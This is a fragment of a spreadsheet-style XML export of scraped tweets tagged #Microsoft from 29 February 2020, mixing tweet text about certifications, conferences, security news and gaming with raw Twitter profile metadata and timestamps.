    <t>{'id': 472850738, 'id_str': '472850738', 'name': 'Brette Bossick', 'screen_name': 'BretteMB', 'location': 'Chicago, IL', 'description': 'Co-Founder &amp; COO @skylinesacademy, former @microsoft &amp; @ahead, passionate learner, teacher, traveler, dog mama, wannabe Chef ðŸ˜Ž', 'url': 'https://t.co/DBeFiVkauk', 'entities': {'url': {'urls': [{'url': 'https://t.co/DBeFiVkauk', 'expanded_url': 'https://www.skylinesacademy.com/', 'display_url': 'skylinesacademy.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 320, 'friends_count': 270, 'listed_count': 6, 'created_at': 'Tue Jan 24 11:09:08 +0000 2012', 'favourites_count': 665, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 159,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'http://pbs.twimg.com/profile_images/1130532081224835073/veydAJVt_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1130532081224835073/veydAJVt_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/472850738/1558375033',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</si>
  <si>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09:00:57 +0000 2020</t>
  </si>
  <si>
    <t>Read my Feb 29 #Microsoft Newsletter featuring Let's Encrypt... https://t.co/QBlkG66p1L Most interesting daily topics about Microsoft.</t>
  </si>
  <si>
    <t>Sat Feb 29 09:00:51 +0000 2020</t>
  </si>
  <si>
    <t>Sign up for next weeks FREE webinar  How can you protect and backup your Office 365 Data? #Webinar #Data #Office365 #Microsoft #Productivity #Datarecovery
Sign up here  https://t.co/H8k5T6SOqF https://t.co/rdCyYoXIU6</t>
  </si>
  <si>
    <t>Sat Feb 29 09:00:15 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Engineer Pleads Guilty to $10m Fraud Scheme https://t.co/FyrwMU7UgX #InfoSecMag</t>
  </si>
  <si>
    <t>{'id': 2475814386, 'id_str': '2475814386', 'name': 'Security News Bot', 'screen_name': 'SecurityNewsbot', 'location': 'Internet', 'description': 'Tweeting all things #InfoSec #Cybercrime #DDoS #Malware #Hackers #Vuln #Botnet and more.', 'url': 'http://t.co/GtNATaA2Uc', 'entities': {'url': {'urls': [{'url': 'http://t.co/GtNATaA2Uc', 'expanded_url': 'http://www.berzerk.org/newsbot', 'display_url': 'berzerk.org/newsbot', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11799, 'friends_count': 9992, 'listed_count': 848, 'created_at': 'Sat May 03 18:08:14 +0000 2014', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 224781,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'http://pbs.twimg.com/profile_images/462655505765126144/pvX4XDcy_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/462655505765126144/pvX4XDcy_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2475814386/1399146859',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</si>
  <si>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09:00:13 +0000 2020</t>
  </si>
  <si>
    <t>My personal website. Senior Software Engineer. Specialized in #Microsoft Technologies including #dotnet #dotnetcore &amp;amp; #Azure 
https://t.co/bXH8SPnIBs https://t.co/Fj4eX1V57h</t>
  </si>
  <si>
    <t>Sat Feb 29 09:00:08 +0000 2020</t>
  </si>
  <si>
    <t>Please join our session about Microsoft Azure Learning and Certification Essentials #certification #microsoft #certifications #azure #microsoftazure #cloud  #cloudcomputing @lkmsug https://t.co/bHXv9M1A3X</t>
  </si>
  <si>
    <t>Sat Feb 29 09:00:02 +0000 2020</t>
  </si>
  <si>
    <t>We invite #researchers from across the globe to research for high impact #vulnerabilities in #Azure #Sphere as a part of our #Microsoft Azure #Bounty Program. Sylvie Liu https://t.co/JUgTxlDZK6 #MSFTAdvocate</t>
  </si>
  <si>
    <t>Sat Feb 29 08:59:39 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/s8ZECFV9ox
#Microsoft Certification Retirement Announced! Future With Role-based Certifications #TechCrumble https://t.co/vVMmC0NBsN</t>
  </si>
  <si>
    <t>{'id': 1058370886380724224, 'id_str': '1058370886380724224', 'name': 'TechCrumble.net', 'screen_name': 'TechCrumbleNET', 'location': '', 'description': 'A Space for Virtualization | A Blog from a VMware vExpert', 'url': 'https://t.co/ph1UvCY3Li', 'entities': {'url': {'urls': [{'url': 'https://t.co/ph1UvCY3Li', 'expanded_url': 'http://www.techcrumble.net', 'display_url': 'techcrumble.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 31, 'friends_count': 205, 'listed_count': 1, 'created_at': 'Fri Nov 02 14:50:57 +0000 2018', 'favourites_count': 241, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 381,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'http://pbs.twimg.com/profile_images/1058371609822683136/aX1Bbq2D_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1058371609822683136/aX1Bbq2D_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1058370886380724224/1541334625', 'profile_link_color': '11779F',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</si>
  <si>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08:57:58 +0000 2020</t>
  </si>
  <si>
    <t>MCSA, MCSD, MCSE certifications retire; with continued investment to role-based certifications https://t.co/lVwLaRsnlo #Microsoft #microsoftlearning #sccm #configmgr #memcm</t>
  </si>
  <si>
    <t>{'id': 1223526456153821185, 'id_str': '1223526456153821185', 'name': 'Youssef SAAD', 'screen_name': 'SaadYoussef0', 'location': 'Morocco', 'description': 'IT Operation Engineer at IBM &amp; OCP JV - Primary focus #SCCM #MEMCM #ConfigMgr #Windows10', 'url': 'https://t.co/gdvjbDxtCW', 'entities': {'url': {'urls': [{'url': 'https://t.co/gdvjbDxtCW', 'expanded_url': 'https://www.prajwaldesai.com/author/youssef-saad/', 'display_url': 'prajwaldesai.com/author/youssefâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 25, 'friends_count': 97, 'listed_count': 0, 'created_at': 'Sat Feb 01 08:40:22 +0000 2020', 'favourites_count': 248, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 72, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1223526650429788160/32rAYFPI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223526650429788160/32rAYFPI_normal.jpg',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</si>
  <si>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08:55:21 +0000 2020</t>
  </si>
  <si>
    <t>Quantum Impact: Teaching the next generation of quantum
#QuantumImpact #Microsoft
https://t.co/WLJOLGWqpU</t>
  </si>
  <si>
    <t>{'id': 1110774000014131201, 'id_str': '1110774000014131201', 'name': 'Tanisorn Jansamret', 'screen_name': 'KagJansamret', 'location': 'Bangkok, Thailand', 'description': 'Information Technology, SIIT, Thammasat University, Thailand ðŸ‡¹ðŸ‡­ #à¹€à¸šà¸à¸ˆà¸¡à¸£à¸²à¸Šà¸¹à¸—à¸´à¸¨ | #Microsoft #MSFTStudentPartner #MSPTH #WindowsInsider', 'url': 'https://t.co/yIw3fHS5G8', 'entities': {'url': {'urls': [{'url': 'https://t.co/yIw3fHS5G8', 'expanded_url': 'http://www.linkedin.com/in/TanisornJ', 'display_url': 'linkedin.com/in/TanisornJ', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 55, 'friends_count': 374, 'listed_count': 0, 'created_at': 'Wed Mar 27 05:22:13 +0000 2019', 'favourites_count': 1641, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1160, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1235248540080721922/OXXV6Lbb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235248540080721922/OXXV6Lbb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1110774000014131201/1583341489',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</si>
  <si>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08:50:44 +0000 2020</t>
  </si>
  <si>
    <t>Good morning #Glasgow! Wishing you all a happy @scottishsummit #SS2020 #Office365 #Microsoft365 #MicrosoftTeams #SharePoint #PowerPlatform #Microsoft https://t.co/46SmmpEDqC</t>
  </si>
  <si>
    <t>Sat Feb 29 08:44:10 +0000 2020</t>
  </si>
  <si>
    <t>Love it! ODutchyy
HC SnD messin around. Who wants to game? First post on Twitter!
#CallofDuty #gamer #xbox #cod #game #pubs #gaming #Microsoft #playstation #stream #twitch #MLG https://t.co/HOEbG3Lefi
 oP Dutchyy (ODutchyy) February 28, 2020</t>
  </si>
  <si>
    <t>{'id': 1168339367074631681, 'id_str': '1168339367074631681', 'name': 'ikikawi', 'screen_name': 'ikikawink', 'location': '', 'description': 'https://t.co/7lxxOuEf7a\nhttps://t.co/wBzJknO5sI\nhttps://t.co/0JiZcaUGxy', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/7lxxOuEf7a', 'expanded_url': 'http://twitch.tv/ikikawi', 'display_url': 'twitch.tv/ikikawi', 'indices': [0, 23]}, {'url': 'https://t.co/wBzJknO5sI', 'expanded_url': 'https://dlive.tv/Ikikawi', 'display_url': 'dlive.tv/Ikikawi', 'indices': [24, 47]}, {'url': 'https://t.co/0JiZcaUGxy', 'expanded_url': 'https://mixer.com/ikikawink', 'display_url': 'mixer.com/ikikawink', 'indices': [48, 71]}]}}, 'protected': False, 'followers_count': 64, 'friends_count': 59, 'listed_count': 0, 'created_at': 'Mon Sep 02 01:49:28 +0000 2019', 'favourites_count': 678, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 341, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1168340178899034114/_3eFWZ1P_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1168340178899034114/_3eFWZ1P_normal.png',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</si>
  <si>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08:42:05 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is retiring its #MCSA , #MCSD and #MCSE certifications in June 2020 | ZDNet https://t.co/LWixPT9uTQ</t>
  </si>
  <si>
    <t>{'id': 2795860959, 'id_str': '2795860959', 'name': 'Milan Jugovic', 'screen_name': 'MilanJugovic', 'location': 'London| Canary Wharf', 'description': 'Passionate about making life better through technology. Londoner, #Level39 #fintech #insurtech| #digital #transformation', 'url': 'https://t.co/HI5OH3WUff', 'entities': {'url': {'urls': [{'url': 'https://t.co/HI5OH3WUff', 'expanded_url': 'http://www.linkedin.com/in/milanitjugovic', 'display_url': 'linkedin.com/in/milanitjugoâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 991, 'friends_count': 820, 'listed_count': 2, 'created_at': 'Tue Sep 30 18:27:03 +0000 2014', 'favourites_count': 1377, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 649,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'http://pbs.twimg.com/profile_images/1037092566607507456/VIV-nCEx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1037092566607507456/VIV-nCEx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2795860959/1519057020',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</si>
  <si>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08:37:02 +0000 2020</t>
  </si>
  <si>
    <t>Great news as the #Microsoft certification route was getting a bit silly!  It won't please the 'celebrity narcissists' though..... #MSFTAdvocate https://t.co/VVDEIbOa5e https://t.co/ajTVBQOEmy</t>
  </si>
  <si>
    <t>{'id': 87385497, 'id_str': '87385497', 'name': 'Nigel Horncastle', 'screen_name': 'internetmale', 'location': 'MojÃ¡car, Spain', 'description': 'Leveraging 40+ years of IT and telecoms consulting experience to deliver Microsoft Online solutions globally', 'url': 'https://t.co/jMTFJdVT6S', 'entities': {'url': {'urls': [{'url': 'https://t.co/jMTFJdVT6S', 'expanded_url': 'http://www.ucom.ae', 'display_url': 'ucom.ae', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 87, 'friends_count': 327, 'listed_count': 7, 'created_at': 'Wed Nov 04 07:24:35 +0000 2009', 'favourites_count': 165, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 853,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'http://pbs.twimg.com/profile_images/999310539162439680/cWfMjbXG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/999310539162439680/cWfMjbXG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/87385497/1574083747',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</si>
  <si>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08:34:51 +0000 2020</t>
  </si>
  <si>
    <t>Because I see so many #LessCodeMorePower T shirts and hoodies, I decided to be original and make mugs with #Microsoft #PowerPlatform Logo to use at home :) https://t.co/lZQ8Vmdyiw</t>
  </si>
  <si>
    <t>{'id': 3035310944, 'id_str': '3035310944', 'name': 'Taiki Yoshida | Microsoft', 'screen_name': 'TaikiYoshidaJP', 'location': 'Tokyo, Japan', 'description': '#å‰ç”°ã®å‚™å¿˜éŒ² | #Microsoft æœ¬ç¤¾ Sr. Program Manager for #PowerApps ï¼† #PowerAutomate &amp; #PowerVirtualAgent | #EmpowerEveryPerson #PowerAddict #JPAUG | Opinions are my own', 'url': 'https://t.co/daAYFvBCKI', 'entities': {'url': {'urls': [{'url': 'https://t.co/daAYFvBCKI', 'expanded_url': 'https://memo.tyoshida.me', 'display_url': 'memo.tyoshida.me', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2147, 'friends_count': 831, 'listed_count': 118, 'created_at': 'Sun Feb 22 00:23:47 +0000 2015', 'favourites_count': 6787, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5591,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'http://pbs.twimg.com/profile_images/709698940887629824/PAZBgi5u_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/709698940887629824/PAZBgi5u_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3035310944/1558653998',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</si>
  <si>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08:32:09 +0000 2020</t>
  </si>
  <si>
    <t>TRACK 1
@fernandoescolar nos habla de n-texture chocolate cake architecture
#netcoreconf #netcore #Azure #Microsoft #Cloud #Xamarin #net #IA #BigData #IoT #Valencia</t>
  </si>
  <si>
    <t>Sat Feb 29 08:31:33 +0000 2020</t>
  </si>
  <si>
    <t>What an entrance!!! 
@scottishsummit #SS2020 #ScottishSummit #Glasgow #Microsoft #Dynamics365 #Office365 #Azure #MicrosoftPartnerCommunity #Saturday https://t.co/YMaSFZ3Pch</t>
  </si>
  <si>
    <t>Sat Feb 29 08:30:13 +0000 2020</t>
  </si>
  <si>
    <t>As part of its Wave 1 2020 updates, #Microsoft has announced a host of new features for #Dynamics365BusinessCentral which will be released in April. In this blog article, we take you through what we feel are the biggest &amp;amp; best of these new capabilities https://t.co/GINdjiwfX3 https://t.co/WuMjMw36yp</t>
  </si>
  <si>
    <t>Sat Feb 29 08:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Meet @sekharonline4u, C# Corner #MVP, #Microsoft Certified Trainer, #Pluralsight Author at @CsharpCorner Annual Conference 2020. Book your seat now:  https://t.co/2mXVrlWhuN #CsharpCon20 #Developers cc 
@graphitegtc @MindcrackerUS @aspose @mcbeniwal https://t.co/wCOjjnRBG4</t>
  </si>
  <si>
    <t>Sat Feb 29 08:29:11 +0000 2020</t>
  </si>
  <si>
    <t>Anybody else having issues with #Microsoft #Teams Recording #MicrosoftTeams</t>
  </si>
  <si>
    <t>{'id': 912107467, 'id_str': '912107467', 'name': 'Daily VM Tech', 'screen_name': 'DailyvMTech', 'location': 'Bahrain', 'description': 'Technical Tips &amp; Support of Data Center, Networking, Data Protection, Email Systems, SAN Storage, Archiving, Backup &amp; Replication. End-To-End @Dell Shop.', 'url': 'https://t.co/Li28qK565T', 'entities': {'url': {'urls': [{'url': 'https://t.co/Li28qK565T', 'expanded_url': 'https://dailyvmtech.wordpress.com/', 'display_url': 'dailyvmtech.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 108, 'friends_count': 262, 'listed_count': 32, 'created_at': 'Mon Oct 29 09:26:37 +0000 2012', 'favourites_count': 902, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1532,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'http://pbs.twimg.com/profile_images/531814123412017156/nfKAvUIN_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/531814123412017156/nfKAvUIN_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/912107467/1429817709',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</si>
  <si>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08:18:52 +0000 2020</t>
  </si>
  <si>
    <t>Thanks for hosting Silvana Salerno and me in Fribourg and sharing Dartfish strategy and business needs. Michael Frossard, Laurent Wenker 
Looking forward to enabling new ventures with you!
 #microsoft #powerplatform #azure #cloud #microsoftpartner</t>
  </si>
  <si>
    <t>{'id': 9962022, 'id_str': '9962022', 'name': 'Thomas Winter', 'screen_name': 'thwinter', 'location': 'Hettlingen CH / SanJose Ca', 'description': '#Microsoft ðŸ‡¨ðŸ‡­Partner and SMC sales lead / 18y #Cisco alumnus / #strategy #innovation #designthinking #digital #SW #disruption #people #sales #family', 'url': 'https://t.co/MUrfOBI5Oe', 'entities': {'url': {'urls': [{'url': 'https://t.co/MUrfOBI5Oe', 'expanded_url': 'http://www.winterblog.me', 'display_url': 'winterblog.me', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1269, 'friends_count': 1832, 'listed_count': 105, 'created_at': 'Mon Nov 05 10:47:15 +0000 2007', 'favourites_count': 1279, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6295,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'http://pbs.twimg.com/profile_images/648619272827236352/W_oXKOIJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/648619272827236352/W_oXKOIJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/9962022/1539445565',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</si>
  <si>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08:16:15 +0000 2020</t>
  </si>
  <si>
    <t>#Pope to endorse principles on #AI #ethics with #Microsoft, #IBM https://t.co/xKl5BbOZ92</t>
  </si>
  <si>
    <t>{'id': 483096073, 'id_str': '483096073', 'name': 'Bruno A. Bonechi', 'screen_name': 'BBonechi', 'location': '', 'description': 'Partner @ Strategy&amp; PwC | Curious Involved Compassionate | #DigitalStrategy #DigitalTransformation #AI | #TransfoNum #IA #Innovation', 'url': 'https://t.co/zGBkDyrlMO', 'entities': {'url': {'urls': [{'url': 'https://t.co/zGBkDyrlMO', 'expanded_url': 'http://linkedin.com/in/bonechi', 'display_url': 'linkedin.com/in/bonechi', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2628, 'friends_count': 2124, 'listed_count': 378, 'created_at': 'Sat Feb 04 16:51:09 +0000 2012', 'favourites_count': 56, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9484,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'http://pbs.twimg.com/profile_images/916271529012363265/z-PYzAAy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/916271529012363265/z-PYzAAy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/483096073/1576846157', 'profile_link_color': '47484D', 'profile_sidebar_border_color': 'BABAB2', 'profile_sidebar_fill_color': 'BABAB2', 'profile_text_color': '2891E2', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 08:15:24 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 08:14:34 +0000 2020</t>
  </si>
  <si>
    <t>#HeyGoogle #Twitter #Microsoft #YouTuber  
This is going to be the next wave of Education
 https://t.co/dB8bB1PlhT</t>
  </si>
  <si>
    <t>{'id': 1135972992029155328, 'id_str': '1135972992029155328', 'name': 'Brayden T Holtz', 'screen_name': 'BraydenHoltz', 'location': '', 'description': 'AGE.SOLUTION is a consulation firm the currently provides Advertising Growth and Education to START UPS that are needing immediate solutions toward their growth', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 7, 'listed_count': 0, 'created_at': 'Tue Jun 04 18:14:01 +0000 2019',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'http://pbs.twimg.com/profile_images/1135974745298522112/JnEpNXiu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1135974745298522112/JnEpNXiu_normal.jpg',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</si>
  <si>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08:12:40 +0000 2020</t>
  </si>
  <si>
    <t>SharePoint Conference 2020: Comprehensive technology, transformative solutions #Microsoft  https://t.co/Rz6QT43pMN</t>
  </si>
  <si>
    <t>Sat Feb 29 08:10:02 +0000 2020</t>
  </si>
  <si>
    <t>Azure Saturday Belgrade started! #azuresaturday #azure #microsoft #mvpbuzz https://t.co/1gLsZHyzt1</t>
  </si>
  <si>
    <t>{'id': 144786485, 'id_str': '144786485', 'name': 'Sasha Kranjac', 'screen_name': 'SasaKranjac', 'location': 'Europe, World and around', 'description': 'Microsoft MVP, SecurityðŸ›¡ï¸ &amp; Azureâ˜ï¸ guy, MCT, MCT RL, CEI, CEH, Technical Trainer, Speaker, avid reader, has an RJ-45 implant... âœˆï¸', 'url': 'https://t.co/4am2hq2d0D', 'entities': {'url': {'urls': [{'url': 'https://t.co/4am2hq2d0D', 'expanded_url': 'http://www.sasakranjac.com', 'display_url': 'sasakranjac.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1858, 'friends_count': 1873, 'listed_count': 117, 'created_at': 'Mon May 17 08:53:08 +0000 2010', 'favourites_count': 9204, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10126,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'http://pbs.twimg.com/profile_images/1145616286963195904/GlTtiK2D_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1145616286963195904/GlTtiK2D_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/144786485/1462091457',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</si>
  <si>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08:05:57 +0000 2020</t>
  </si>
  <si>
    <t>Updated #Microsoft Edge will protect you from #malware, #crypto miners and more - BetaNews https://t.co/lzttDCswNR 
#cryptomining #CryptoJacking #cryptocurrencies #infosec #cybersecurity #infosecurity</t>
  </si>
  <si>
    <t>Sat Feb 29 08:04:56 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">
Registration link in the bio or call us on:
: +973 17 535393
#Bahrain #Manama #Microsoft #it #excel #certificate #professional #tamkeen https://t.co/Ksi4OAxZQT</t>
  </si>
  <si>
    <t>Sat Feb 29 08:03:16 +0000 2020</t>
  </si>
  <si>
    <t>#Keynote @spsbre @NickiBorell #Microsoft 365 Model - a new rhythm of business https://t.co/lhZCS1ySPW</t>
  </si>
  <si>
    <t>Sat Feb 29 08:02:19 +0000 2020</t>
  </si>
  <si>
    <t>Now @NickiBorell keynote #Microsoft a new rhythm of business #Spsbre @spbre https://t.co/lfQRfXSZm3</t>
  </si>
  <si>
    <t>{'id': 946030087, 'id_str': '946030087', 'name': 'Dennis Hobmaier', 'screen_name': 'DHobmaier', 'location': 'Austria, AT', 'description': '#Consultant - Digital Workplace @InsightEnt - #SharePoint, #Office365 and #Azure. #MCSE SharePoint, #MCITP, #MCSA, #Podcast #Blog #Speaker', 'url': 'https://t.co/6vpUSDoc8V', 'entities': {'url': {'urls': [{'url': 'https://t.co/6vpUSDoc8V', 'expanded_url': 'https://www.hobmaier.net', 'display_url': 'hobmaier.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 552, 'friends_count': 454, 'listed_count': 99, 'created_at': 'Tue Nov 13 15:49:51 +0000 2012', 'favourites_count': 2179, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3204,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'http://pbs.twimg.com/profile_images/933319492989603840/2uFSkHNc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/933319492989603840/2uFSkHNc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/946030087/1511355683',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</si>
  <si>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07:49:48 +0000 2020</t>
  </si>
  <si>
    <t>Thank you for this! Humans of IT. Empowering technologists to achieve more by humanizing tech #HumansofIT #microsoft. Read more about it at https://t.co/oPufituWlJ https://t.co/a2NCu53XdQ https://t.co/T5maO1CNXZ</t>
  </si>
  <si>
    <t>{'id': 15257419, 'id_str': '15257419', 'name': 'Alexander Meijers', 'screen_name': 'ameijers', 'location': 'The Netherlands', 'description': 'Mixed Reality Evangelist | Innovator | Influencer | Microsoft MVP | Founder of https://t.co/VWYyDx1cgi &amp; https://t.co/shNRuMiATa | HoloLens | Azure | AI | Office 365 | Speaker', 'url': 'https://t.co/FRqtY0d4U3', 'entities': {'url': {'urls': [{'url': 'https://t.co/FRqtY0d4U3', 'expanded_url': 'http://www.appzinside.com', 'display_url': 'appzinside.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/VWYyDx1cgi', 'expanded_url': 'http://MixUG.nl', 'display_url': 'MixUG.nl', 'indices': [79, 102]}, {'url': 'https://t.co/shNRuMiATa', 'expanded_url': 'http://GlobalMRBootcamp.com', 'display_url': 'GlobalMRBootcamp.com', 'indices': [105, 128]}]}}, 'protected': False, 'followers_count': 1630, 'friends_count': 873, 'listed_count': 210, 'created_at': 'Fri Jun 27 20:11:16 +0000 2008', 'favourites_count': 3191, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5991,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'http://pbs.twimg.com/profile_images/903972632122597377/-FNfPFn9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/903972632122597377/-FNfPFn9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15257419/1536919259', 'profile_link_color': '686E70',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</si>
  <si>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Sat Feb 29 07:48:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, Walt Disney, Gilead Sciences: Stocks That Defined the Week -- WSJ #Microsoft #Stock #MarketScreener https://t.co/kghSKtZ3Fb https://t.co/9tt3jjXj5u</t>
  </si>
  <si>
    <t>{'id': 102325185, 'id_str': '102325185', 'name': 'MarketScreener.com', 'screen_name': 'Market_Screener', 'location': '', 'description': 'Find all financials news in real time. Equities, Indexes, Commodities, Currencies, Analysis, Top &amp; Flop #MarketScreener', 'url': 'https://t.co/O2QH5VgwDT', 'entities': {'url': {'urls': [{'url': 'https://t.co/O2QH5VgwDT', 'expanded_url': 'http://www.marketscreener.com', 'display_url': 'marketscreener.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9763, 'friends_count': 80, 'listed_count': 1238, 'created_at': 'Wed Jan 06 09:33:43 +0000 2010', 'favourites_count': 288, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1888347,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'http://pbs.twimg.com/profile_images/1041668619531444225/DYWcRasA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1041668619531444225/DYWcRasA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/102325185/1550585065', 'profile_link_color': '288842',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</si>
  <si>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Sat Feb 29 07:40:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Confirms Serious Surface Laptop Problem  Forbes https://t.co/OSNN2DNOWA #TechJunkieNews https://t.co/FiqC5kkFKF</t>
  </si>
  <si>
    <t>Sat Feb 29 07:34:46 +0000 2020</t>
  </si>
  <si>
    <t>OSI lost two co-founders in 2 months. 2 months! After 20+ years. That's 2 fewer people who still spoke about -- and against -- #openwashing 
#osi bygone? #microsoft already listed THRICE in the Sponsors page -- more than any company!</t>
  </si>
  <si>
    <t>Sat Feb 29 07:30:25 +0000 2020</t>
  </si>
  <si>
    <t>Join us on 29th and 30th April 2020 at Mercedes-Benz World for the #Microsoft #Teams Conference, @Commsverse, where you can learn about how our #contactcentre #collaboration with Microsoft Teams can elevate your traditional contact centre. https://t.co/XPzHiYVCiR</t>
  </si>
  <si>
    <t>{'id': 2587140344, 'id_str': '2587140344', 'name': 'Astrid Pocklington', 'screen_name': 'AstridPock', 'location': '', 'description': '#CustomerEngagement #CustomerExperience #DemandGeneration', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 219, 'friends_count': 456, 'listed_count': 8, 'created_at': 'Wed Jun 25 08:45:16 +0000 2014', 'favourites_count': 264, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 962,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'http://pbs.twimg.com/profile_images/1204443303409831947/Weo4Emp6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1204443303409831947/Weo4Emp6_normal.jpg',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</si>
  <si>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07:28:03 +0000 2020</t>
  </si>
  <si>
    <t>#Veyseloglu Group leaps into the #cloud to speed up business - #Microsoft #Azerbaijan #Retail #Azure #Squalio Fuad Aslanov https://t.co/Tvh61YC4wo #MSFTAdvocate</t>
  </si>
  <si>
    <t>Sat Feb 29 07:27:41 +0000 2020</t>
  </si>
  <si>
    <t>PS4 or Xbox One? Hardcore gamer or casual? Want to know which is the right console for you? 
find out more by clicking on the link below.
https://t.co/MFhVWVLFeMi
#techreview #Playstation #Xbox #Microsoft #PS4 #Xboxone #PS4VSXBOXONE #PS4review #Sony #SonyvsMicrosoft https://t.co/brBFKFhviR</t>
  </si>
  <si>
